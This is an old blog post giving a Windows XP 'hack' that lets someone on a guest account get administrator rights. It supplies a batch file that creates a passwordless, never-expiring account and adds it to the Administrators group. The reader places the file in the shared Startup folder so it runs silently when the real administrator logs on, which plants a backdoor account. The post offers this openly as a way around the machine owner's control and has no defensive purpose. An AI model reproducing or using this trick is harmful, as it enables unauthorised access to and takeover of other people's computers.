Sunday, November 29, 2009

Using Guest Account Create An Admin Account



Want to create an Admin account in a PC ,where you are a Guest?i.e; Using Guest Account Create An Admin Account.
The following Trick (Hack) can do that.

Step 1: Open up Notepad, copy and paste the following code into it and save the file as admin.bat. (You could actually give it any name, just make sure that the extension is .bat)

----------------------------------Code---------------------------------
@echo off
net user Newadmin /add /expires:never /passwordreq:no
net localgroup “Administrators” /add Newadmin
--------------------------------------------------------------------------

Step 2: Copy the file to the Startup folder. Here is the path to the Startup folder:

C:\Documents and Settings\All Users\Start Menu\Programs\Startup

The next time the admin logs on into the computer, the batch file runs and the admin account is created. Once the admin logs off, you can log in using the username newadmin and without any password.

Remember that it wouldn’t take long for the real admin to find out that a new admin account has been created.

Rate or comment on this Post please, So that we can serve you better.

Tags:Create admin account.Tips n tricks,Hacks on Windows XP,
© stuffadda.blogspot.com|stuffcenter.co.cc|stuffcentre.co.cc

0 comments:

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 

Best Viewed in Mozilla Firefox, >IE6, Chrome, opera. Mobile Version
©2009-2012 All Rights reserved by Owner. Stuffadda ® is a Trade Mark owned by the owner of this page. By visiting this website you are accepting all the T&Cs.
Please read the Disclaimer | Email Admin.

Related Posts Plugin for WordPress, Blogger...